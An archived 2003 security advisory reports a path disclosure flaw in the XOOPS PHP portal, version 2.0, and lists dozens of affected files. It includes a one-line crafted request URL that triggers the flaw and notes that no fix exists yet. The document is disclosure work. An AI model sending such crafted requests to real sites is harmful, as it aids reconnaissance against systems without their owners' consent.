Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: a6076.htm

XOOPS path disclosure



20th Mar 2003 [SBWID-6076]
COMMAND

	XOOPS path disclosure

SYSTEMS AFFECTED

	XOOPS VERSIONS: v2.0 (and prior ?)

PROBLEM

	Grégory Le  Bras  aka  GaLiaRePt  [http://www.Security-Corporation.com],
	Security Corporation Security Advisory [SCSA-011] :
	
	 http://www.security-corporation.com/index.php?id=advisories&a=011-FR
	
	
	 DESCRIPTION
	 ________________________________________________________________________
	
	XOOPS is "a dynamic  OO  (Object  Oriented)  based  open  source  portal
	script written in PHP. XOOPS is the ideal tool for developing  small  to
	large  dynamic  community  websites,intra  company  portals,   corporate
	portals, weblogs and much more." (direct quote from XOOPS website)
	
	
	 DETAILS & EXPLOITS
	 ________________________________________________________________________
	
	¤ Details Path Disclosure :
	
	A vulnerability have been  found  in  XOOPS  which  allow  attackers  to
	determine the physical path of the application.
	
	This vulnerability would allow a remote user to determine the full  path
	to the web root directory and other potentially  sensitive  information.
	This vulnerability can be  triggered  by  a  remote  user  submitting  a
	specially  crafted  HTTP  request  including  invalid   input   to   the
	"$xoopsOption" variable.
	
	¤ Exploits Path Disclosure :
	
	http://[target]/index.php?xoopsOption=any_word
	
	Affected files:
	
	admin.php
	edituser.php
	footer.php
	header.php
	image.php
	lostpass.php
	pmlite.php
	readpmsg.php
	register.php
	search.php
	user.php
	userinfo.php
	viewpmsg.php
	class/xoopsblock.php
	modules/contact/index.php
	modules/mydownloads/index.php
	modules/mydownloads/brokenfile.php
	modules/mydownloads/modfile.php
	modules/mydownloads/ratefile.php
	modules/mydownloads/singlefile.php
	modules/mydownloads/submit.php
	modules/mydownloads/topten.php
	modules/mydownloads/viewcat.php
	modules/mylinks/brokenlink.php
	modules/mylinks/index.php
	modules/mylinks/modlink.php
	modules/mylinks/ratelink.php
	modules/mylinks/singlelink.php
	modules/mylinks/submit.php
	modules/mylinks/topten.php
	modules/mylinks/viewcat.php
	modules/newbb/index.php
	modules/newbb/search.php
	modules/newbb/viewforum.php
	modules/newbb/viewtopic.php
	modules/news/archive.php
	modules/news/article.php
	modules/news/index.php
	modules/sections/index.php
	modules/system/admin.php
	modules/xoopsfaq/index.php
	modules/xoopsheadlines/index.php
	modules/xoopsmembers/index.php
	modules/xoopspartners/index.php
	modules/xoopspartners/join.php
	modules/xoopspoll/index.php
	modules/xoopspoll/pollresults.php
	

SOLUTION

	None yet


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH